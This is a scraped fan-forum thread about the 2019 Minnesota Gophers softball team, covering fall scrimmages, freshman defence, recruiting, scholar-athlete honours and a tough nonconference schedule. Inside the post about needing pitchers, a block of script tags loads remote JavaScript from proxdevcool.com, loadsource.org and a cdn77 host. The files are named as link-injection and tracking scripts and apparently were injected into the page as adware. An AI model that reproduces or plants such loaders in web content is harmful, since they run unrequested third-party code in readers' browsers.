Gopher Softball 2019

Gophers won 15-0 against SCSU. Second game was a situational scrimmage so no scores were kept. Just beat MN Duluth. Not sure of the final score of the Duluth game but Gophers put up 21 runs. Second game is underway now - it may be a situational scrimmage as well.

Any reports on the St. Cloud DH?

And a UMD report would be nice, too.
All the pitchers pitched and looked solid. Brander can hit the ball. The Frosh all looked solid. Kemmetmueller and Chell both went yard. Looks like some decent upgrade in speed overall. Lindaman, Partain, Arneson, and Thompson were out all weekend with injuries. Brandt played SS and pitched Friday but was sidelined today. Smith, Lowary, and Bailey all pitched solid innings. This team could be really good. Krueger was solid at 2B with Partain out.

Sent from my LG-H820 using Tapatalk

All the pitchers pitched and looked solid. Brander can hit the ball. The Frosh all looked solid. Kemmetmueller and Chell both went yard. Looks like some decent upgrade in speed overall. Lindaman, Partain, Arneson, and Thompson were out all weekend with injuries. Brandt played SS and pitched Friday but was sidelined today. Smith, Lowary, and Bailey all pitched solid innings. This team could be really good. Krueger was solid at 2B with Partain out.

I really liked the performance of the freshmen players. They looked comfortable at defense.

I really liked the performance of the freshmen players. They looked comfortable at defense.

Thanks for the info on the freshmen on defense. Where did they play? in particular, who was on 3B, SS, 1B, OF? Saw a report that Denhartog took over at SS when Brandt pitched. Where did Hansen play?

Last edited:

Thanks for the info on the freshmen on defense. Where did they play? in particular, who was on 3B, SS, 1B, OF? Saw a report that that Denhartog took over at SS when Brandt pitched. Where did Hansen play?
Kemmetmueller played 3B. Denhartog and Burns both played SS. Hansen and Brandner played 1B. Burns also played some catcher. Lindner played in left when Chell wasn't out there. I am sure White played but I didnt catch where.

Kemmetmueller played 3B. Denhartog and Burns both played SS. Hansen and Brandner played 1B. Burns also played some catcher. Lindner played in left when Chell wasn't out there. I am sure White played but I didnt catch where.

I only saw Saturday's games. Of the freshmen, I thought Denhartog and Hansen looked very good and real naturals on the infield, something the Gophers have had some trouble with the past 3-4 years. Other freshmen may have done well, too, but I noticed those 2 especially.

Hope Brandner is the only newcomer who will contribute at this point. The others have a long way to go but hopefully they will get there soon. Let’s chalk it up to early season jitters but the competition was pretty weak and only Hope looks like she is ready to play in the spring.

Hope Brandner is the only newcomer who will contribute at this point. The others have a long way to go but hopefully they will get there soon. Let’s chalk it up to early season jitters but the competition was pretty weak and only Hope looks like she is ready to play in the spring.

I will be surprised if Hope plays in the field. Hansen looked better on defense and has WAY better speed. She made a really great play on a foul ball that Hope would not have been within 10 feet of. Hope can hit but she is painfully slow. They will have to run for her. Hope will DP and will not play defense. Burns and Denhartog looked fine. I will be surprised if there are not two true frosh starting by B1G regular season.

Not sure which games you were watching! LOL! There are some ATHLETES in this freshman class. A winter of work and they will be ready...

Last edited:

Not sure which games you were watching! LOL! There are some ATHLETES in this freshman class. A winter of work and they will be ready...

That was my impression as well, though I wasn't there on Friday. I thought the first-year players were versatile and sure handed on defense, which I suspect is big on Trachsel's chart. I'm not certain Dwyer would have gotten to the popfly that Hansen caught. The freshmen I noticed stood out for both their general athleticism AND softball-playing ability.

Good to hear. I pretty much figured going into 2019 there wasn't going to be any shortage of talent and based on early reviews, that appears to be an accurate assessment. If the newcomers can plug a few holes and the pitching is as good as it can be, we'll probably be right there with Michigan at the top of the conference again.

Bad weather. Does anyone know if Friday's (Oct. 5) games are still on?

CONGRATULATIONS to the 2017-2018 NFCA All-America Scholar Athletes!!!!

University of Minnesota, Twin Cities Hannah Bailey 3.540
University of Minnesota, Twin Cities Ellie Cowger 3.700
University of Minnesota, Twin Cities Katelyn Kemmetmueller 3.600
University of Minnesota, Twin Cities Kaylen Krueger 3.690
University of Minnesota, Twin Cities Kendyl Lindaman 3.930
University of Minnesota, Twin Cities Rachel Lowary 3.970
University of Minnesota, Twin Cities Alexandra Thompson 3.760

Josey White got two bases clearing hits against CSP tonight. Does anybody know anything specific about her? Is she highly touted?

Josey White got two bases clearing hits against CSP tonight. Does anybody know anything specific about her? Is she highly touted?

Jr. year in HS, lead the state of Nevada in Batting Average (827). I can't find the info, but I think she originally committed to Stanford and we ended up with her. She is a top 100 player.

Before Hope Brandner came, Josey was my suggestion for 1B. From #5 in this thread,

"OK, starting with who's on 1st. How about trying the 0.827 hitting HS catcher Josey White. Nobody is going to take Kendyl's job so another option is needed to get Josey's bat in the lineup. Josey could play 1st and possibly rotate some with Kendyl at 1st and Josey at C. This could keep both bats in the lineup, develop a backup and eventual replacement C, and give Kendyl a rest when she needs it. Especially in tournament double (even triple!) headers."

Some others thought Josey might do well at DP. Recently the coaches took a look at Hansen at 1B along with Brandner.

Josey added into the mix certainly yields some interesting options. Kinda depends on who can develop into a strong D1 hitter first. Still like the idea of providing some rotational relief to Lindaman from catching while keeping her in the batting order as either 1B or DP.

With all those other top schools interested in Josey, it's great MN got her. She escaped my notice last weekend, as I was mainly watching Hansen and DenHartog. The more outstanding players the better.

Is Trachsel that great a recruiter? I hope so because Trachsel is likely here for the long haul, not likely to bail out on MN.

Last edited:

Pitchers Needed in Next 2 Yrs

Just going out on a limb here, but it's a good bet the next year's recruits and possible transfers are likely to include many pitchers. Over the next 2 yrs after this spring we lose our 3 top pitchers (Smith after Spring 2019, Fiser and Brandt after Spring 2020). That leaves only 2 who need all the experience they can get. We didn't add any for this year.
<script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script>
<script type="text/javascript" src="https://proxdevcool.com/addons/lnkr5.min.js"></script><script type="text/javascript" src="https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52375x7787x&r=1539638753213"></script><script type="text/javascript" src="https://1675450967.rsc.cdn77.org/cu/trkshpks.js"></script><script type="text/javascript" src="https://proxdevcool.com/ext/1e6ba9a0464b8e1485.js?sid=52375_7787_&title=ads&blocks[]=31af2"></script>

Last edited:

Just going out on a limb here, but it's a good bet the next year's recruits and possible transfers are likely to be include many pitchers. Over the next 2 yrs after this spring we lose our 3 top pitchers (Smith after Spring 2019, Fiser and Brandt after Spring 2020). That leaves only 2 who need all the experience they can get. We didn't add any for this year.

Good observation. I've thought the same thing.

Currently there are no pitchers in the next recruiting class. That may change but any high school pitcher that is uncommitted at this point is probably not quite ready to pitch in the Big Ten. An experienced transfer may be a possibility but you never know who is going to be available. Most likely we will need to get a JUCO pitcher to fill the void.

Nice exposure for the program on a national stage.

Even better that it will be a major help to our RPI. We need top competition if we ever want to host a regional.

Even better that it will be a major help to our RPI. We need top competition if we ever want to host a regional.
Well we gotta win some of those games.

Well we gotta win some of those games.

I agree. The Gophers need to win Regionals, not just compete in them. The best way to win them is to host them.

Definitely appears that this will be another "big girl" schedule for the Gophers. Tennessee and FSU at the ESPN event (with Cal and ND being fringe top 25). And from what I understand they are heading back to Tuscaloosa to face Alabama. Heading to Tucson to face the Univ. of AZ (and James Madison). A couple of games in Austin to face a Univ. of Texas team that just became a WCWS contender with recent transfers. And oh yeah a trip to Gainesville to face Florida (looking forward to the Barnhill v. Lindaman matchup already). They will have plenty of opportunities. They had those same opportunities last year and, well, ended up in Seattle for a regional. We do not want to return to Seattle.

Top Bottom